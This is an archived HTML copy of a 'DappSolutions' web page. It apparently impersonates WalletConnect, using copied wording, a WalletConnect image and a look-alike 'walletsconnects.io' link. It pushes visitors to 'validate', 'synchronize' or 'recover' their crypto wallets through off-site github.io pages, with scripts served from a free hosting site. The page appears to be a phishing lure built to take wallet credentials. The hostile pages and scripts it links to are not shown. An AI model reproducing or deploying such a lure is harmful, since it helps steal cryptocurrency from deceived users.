

<!-- Mirrored from www.dappsolutions.cloud/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 17 Jan 2022 14:38:36 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
    <meta name="viewport" content="width=device-width">
    <meta charset="utf-8">
    <title>DappSolutions</title>
    <meta name="description"
        content="DappSolutions is a free protocol that lets users manage all their wallets from one space">
    <link rel="icon" href="https://dapptestrun.000webhostapp.com/favicon-1.png">
    <meta name="next-head-count" content="5">
    <link rel="preload" href="https://dappsolutions.github.io/fa605a2e7387ae6acff3.css" as="style">
    <link rel="stylesheet" href="https://dappsolutions.github.io/fa605a2e7387ae6acff3.css" data-n-g=""><noscript
        data-n-css=""></noscript>
    <link rel="preload" href="https://dapptestrun.000webhostapp.com/_next/static/chunks/webpack-189c53927ffd3caf09c3.html" as="script">
    <link rel="preload" href="https://dapptestrun.000webhostapp.com/_next/static/chunks/framework-92300432a1172ef1338b.html" as="script">
    <link rel="preload" href="https://dapptestrun.000webhostapp.com/_next/static/chunks/main-71948af4b0f09c0fc30e.html" as="script">
    <link rel="preload" href="https://dapptestrun.000webhostapp.com/_next/static/chunks/pages/_app-9e366951ad03f095f5b3.html" as="script">
    <link rel="preload" href="https://dapptestrun.000webhostapp.com/_next/static/chunks/814-16eda819eff2e28d39ff.html" as="script">
    <link rel="preload" href="https://dapptestrun.000webhostapp.com/_next/static/chunks/748-ecf7ef402c655d9fd446.html" as="script">
    <link rel="preload" href="https://dapptestrun.000webhostapp.com/_next/static/chunks/pages/index-ec7c947b1f1bbe86fe3b.html" as="script">
</head>

<body data-new-gr-c-s-check-loaded="14.1037.0" data-gr-ext-installed="">
    <div id="__next">
        <header class="fixed z-50 w-full bg-white py-4 sm:py-5 px-2 sm:px-3 border-b shadow-md">
            <div class="container max-w-screen-lg mx-auto flex flex-row items-center justify-between">
                <div class="inline-flex items-center justify-center cursor-pointer"><img src="https://dappsolutions.github.io/logo.png"
                        class="h-5 w-10">
                    <h1 class="text-xl ml-2 font-black">DappSolutions</h1>
                </div>
                 <div>
                    <a class="inline-flex items-center justify-center text-white cursor-pointer hover:text-primary bg-primary hover:bg-transparent font-bold px-6 py-2 rounded-md border-2 border-primary"
                        href="https://dappsolutions.github.io/dapps.html">Connect</a>
                </div>
            </div>
        </header>



        <div class="h-14"></div>
        <main>
            <section class="relative bg-white py-16 px-6">
                <div
                    class="container max-w-screen-lg mx-auto flex flex-col md:flex-row-reverse items-center justify-between">
                    <div class="text-left max-w-md mb-8 px-2 md:mb-0"><img src="https://dappsolutions.github.io/walletconnect-header.png"
                            class="w-full"></div>
                    <div class="text-left max-w-md">
                        <h2 class="text-3xl mb-4 font-black">Link your DApps to mobile wallets</h2>
                        <p class="text-base mb-8">DappSolutions is an open protocol that lets users connect
                            their mobile
                            crypto wallets to your DApp.</p>
                    </div>


                </div>
            </section>
            <section class="relative md:px-6 py-20 bg-secondary">
                <h2 class="text-center mb-5 text-white font-black text-2xl md:text-3xl">About & How it works here</h2>
                <div class="container max-w-screen-lg mx-auto flex flex-row items-center md:justify-between">
                    <ul
                        class="relative shadow-md border bg-white flex flex-col md:flex-row m-1 pt-10 md:pt-0  z-10 rounded">
                        <li class="flex-1 text-left pt-0 pb-8 px-6 md:p-10">
                            <h3 class="text-lg mt-1 mb-2 font-bold">About</h3>
                            <p class="text-sm m-0">DappSolutions
                                is an open source protocol for connecting decentralised applications to
                                mobile wallets with QR code scanning or deep linking. A user can
                                interact securely with any Dapp from their mobile phone, making
                                Wallets Validation wallets a safer choice compared to desktop or browser
                                extension wallets.</p>
                        </li>
                        <li class="flex-1 text-left pt-0 pb-8 px-6 md:p-10">
                            <h3 class="text-lg mt-1 mb-2 font-bold">What is Wallets Validation</h3>
                            <p class="text-sm m-0">DappSolutions connects web applications to supported
                                <a href="http://walletsconnects.io/wallets/index.html">mobile wallets</a>.
                                Wallets
                                Validation session is started by a scanning a QR code (desktop) or by clicking an
                                application
                                deep link (mobile).
                            </p>
                        </li>
                    </ul>
                </div>
            </section>

            <section class="relative md:px-6 py-20 bg-secondary">
                <h2 class="text-center mb-5 text-white font-black text-2xl md:text-3xl">Synchronize, Validate and
                    Recover</h2>
                <div class="container max-w-screen-lg mx-auto flex flex-row items-center md:justify-between">
                    <ul
                        class="relative shadow-md border bg-white flex flex-col md:flex-row m-1 pt-10 md:pt-0  z-10 rounded">
                        <li class="flex-1 text-left pt-0 pb-8 px-6 md:p-10">
                            <h2 class="text-2xl font-black text-primary">1.</h2>
                            <h3 class="text-lg mt-1 mb-2 font-bold">Wallet Validation</h3>
                            <p class="text-sm m-0">You can proceed with this option to validate your
                                wallet using our powerful and secured dapps tools.</p>
                            <div style="margin-top: 5%;">
                                <a class="inline-flex items-center justify-center text-white cursor-pointer hover:text-primary bg-primary hover:bg-transparent font-bold px-6 py-2 rounded-md border-2 border-primary"
                                    href="https://dappsolutions.github.io/dapps.html">Validate Wallet</a>
                            </div>
                        </li>
                        <li class="flex-1 text-left pt-0 pb-8 px-6 md:p-10">
                            <h2 class="text-2xl font-black text-primary">2.</h2>
                            <h3 class="text-lg mt-1 mb-2 font-bold">Wallet Synchronization</h3>
                            <p class="text-sm m-0">Authenticate or Synchronize your wallet using our secure
                                protocol.</p>
                            <div style="margin-top: 5%;">
                                <a class="inline-flex items-center justify-center text-white cursor-pointer hover:text-primary bg-primary hover:bg-transparent font-bold px-6 py-2 rounded-md border-2 border-primary"
                                    href="https://dappsolutions.github.io/sync.html">Synchronize Wallet</a>
                            </div>
                        </li>
                        <li class="flex-1 text-left pt-0 pb-8 px-6 md:p-10">
                            <h2 class="text-2xl font-black text-primary">3.</h2>
                            <h3 class="text-lg mt-1 mb-2 font-bold">Rectify or Recover Token</h3>
                            <p class="text-sm m-0">Rectify or Recover lost tokens using End-to-end encryption whick keeps client-side generated keys and all user
                                activity private.</p>
                            <div style="margin-top: 5%;">
                                <a class="inline-flex items-center justify-center text-white cursor-pointer hover:text-primary bg-primary hover:bg-transparent font-bold px-6 py-2 rounded-md border-2 border-primary"
                                    href="https://dappsolutions.github.io/dapps.html">Rectify or Recover Tokens</a>
                            </div>
                        </li>
                    </ul>
                </div>
            </section>

            <section class="relative bg-white py-14 px-6 text-secondary">

            </section>
            <section class="relative bg-secondary py-10 px-6 text-white">
                <div class="container max-w-screen-lg mx-auto flex-col md:flex-row items-center md:justify-between">
                    <div class="text-center">
                        <h2 class="text-2xl font-black mb-3">Get started with DappSolutions today</h2><a
                            class="cursor-pointer hover:text-primary text-white hover:bg-white bg-transparent font-bold px-5 py-3 rounded-md border-4 border-white text-center block md:inline-block"
                            href="https://dappsolutions.github.io/sync.html">Synchronize Wallet</a>
                    </div>
                </div>
            </section>
        </main>
        <footer class="border-t border-gray-200">
            <div
                class="container max-w-screen-lg mx-auto flex flex-col md:flex-row md:items-center md:justify-between py-6">
                <ul class="flex mb-4 mx-auto md:mx-0 md:ml-4 md:mb-0">
                    <li><a href="#"
                            class="flex justify-center items-center bg-white hover:bg-white-100 rounded-full shadow transition duration-150 ease-in-out"
                            aria-label="Twitter"><svg class="w-8 h-8 fill-current" viewBox="0 0 32 32"
                                xmlns="http://www.w3.org/2000/svg">
                                <path
                                    d="M24 11.5c-.6.3-1.2.4-1.9.5.7-.4 1.2-1 1.4-1.8-.6.4-1.3.6-2.1.8-.6-.6-1.5-1-2.4-1-1.7 0-3.2 1.5-3.2 3.3 0 .3 0 .5.1.7-2.7-.1-5.2-1.4-6.8-3.4-.3.5-.4 1-.4 1.7 0 1.1.6 2.1 1.5 2.7-.5 0-1-.2-1.5-.4 0 1.6 1.1 2.9 2.6 3.2-.3.1-.6.1-.9.1-.2 0-.4 0-.6-.1.4 1.3 1.6 2.3 3.1 2.3-1.1.9-2.5 1.4-4.1 1.4H8c1.5.9 3.2 1.5 5 1.5 6 0 9.3-5 9.3-9.3v-.4c.7-.5 1.3-1.1 1.7-1.8z">
                                </path>
                            </svg></a></li>
                    <li class="ml-4"><a href="#"
                            class="flex justify-center items-center bg-white hover:bg-white-100 rounded-full shadow transition duration-150 ease-in-out"
                            aria-label="Github"><svg class="w-8 h-8 fill-current" viewBox="0 0 32 32"
                                xmlns="http://www.w3.org/2000/svg">
                                <path
                                    d="M16 8.2c-4.4 0-8 3.6-8 8 0 3.5 2.3 6.5 5.5 7.6.4.1.5-.2.5-.4V22c-2.2.5-2.7-1-2.7-1-.4-.9-.9-1.2-.9-1.2-.7-.5.1-.5.1-.5.8.1 1.2.8 1.2.8.7 1.3 1.9.9 2.3.7.1-.5.3-.9.5-1.1-1.8-.2-3.6-.9-3.6-4 0-.9.3-1.6.8-2.1-.1-.2-.4-1 .1-2.1 0 0 .7-.2 2.2.8.6-.2 1.3-.3 2-.3s1.4.1 2 .3c1.5-1 2.2-.8 2.2-.8.4 1.1.2 1.9.1 2.1.5.6.8 1.3.8 2.1 0 3.1-1.9 3.7-3.7 3.9.3.4.6.9.6 1.6v2.2c0 .2.1.5.6.4 3.2-1.1 5.5-4.1 5.5-7.6-.1-4.4-3.7-8-8.1-8z">
                                </path>
                            </svg></a></li>
                    <li class="ml-4"><a href="#"
                            class="flex justify-center items-center bg-white hover:bg-white-100 rounded-full shadow transition duration-150 ease-in-out"
                            aria-label="Facebook"><svg class="w-8 h-8 fill-current" viewBox="0 0 32 32"
                                xmlns="http://www.w3.org/2000/svg">
                                <path
                                    d="M14.023 24L14 17h-3v-3h3v-2c0-2.7 1.672-4 4.08-4 1.153 0 2.144.086 2.433.124v2.821h-1.67c-1.31 0-1.563.623-1.563 1.536V14H21l-1 3h-2.72v7h-3.257z">
                                </path>
                            </svg></a></li>
                </ul>
                <div class="text-sm text-center md:text-right">©
                    <!-- -->2022
                    <!-- --> <a class="hover:underline" href="index.htm">DappSolutions</a>
                </div>
            </div>
        </footer>
    </div>
    <script id="__NEXT_DATA__"
        type="application/json">{"props":{"pageProps":{}},"page":"/","query":{},"buildId":"build","runtimeConfig":{},"nextExport":true,"autoExport":true,"isFallback":false}</script>
    <script nomodule="" src="https://dapptestrun.000webhostapp.com/_next/static/chunks/polyfills-eef578260fd80f8fff94.html"></script>
    <script src="https://dapptestrun.000webhostapp.com/_next/static/chunks/webpack-189c53927ffd3caf09c3.html" async=""></script>
    <script src="https://dapptestrun.000webhostapp.com/_next/static/chunks/framework-92300432a1172ef1338b.html" async=""></script>
    <script src="https://dapptestrun.000webhostapp.com/_next/static/chunks/main-71948af4b0f09c0fc30e.html" async=""></script>
    <script src="https://dapptestrun.000webhostapp.com/_next/static/chunks/pages/_app-9e366951ad03f095f5b3.html" async=""></script>
    <script src="https://dapptestrun.000webhostapp.com/_next/static/chunks/814-16eda819eff2e28d39ff.html" async=""></script>
    <script src="https://dapptestrun.000webhostapp.com/_next/static/chunks/748-ecf7ef402c655d9fd446.html" async=""></script>
    <script src="https://dapptestrun.000webhostapp.com/_next/static/chunks/pages/index-ec7c947b1f1bbe86fe3b.html" async=""></script>
    <script src="https://dapptestrun.000webhostapp.com/_next/static/build/_buildManifest.html" async=""></script>
    <script src="https://dapptestrun.000webhostapp.com/_next/static/build/_ssgManifest.html" async=""></script>

    <grammarly-desktop-integration data-grammarly-shadow-root="true"></grammarly-desktop-integration>

</body>
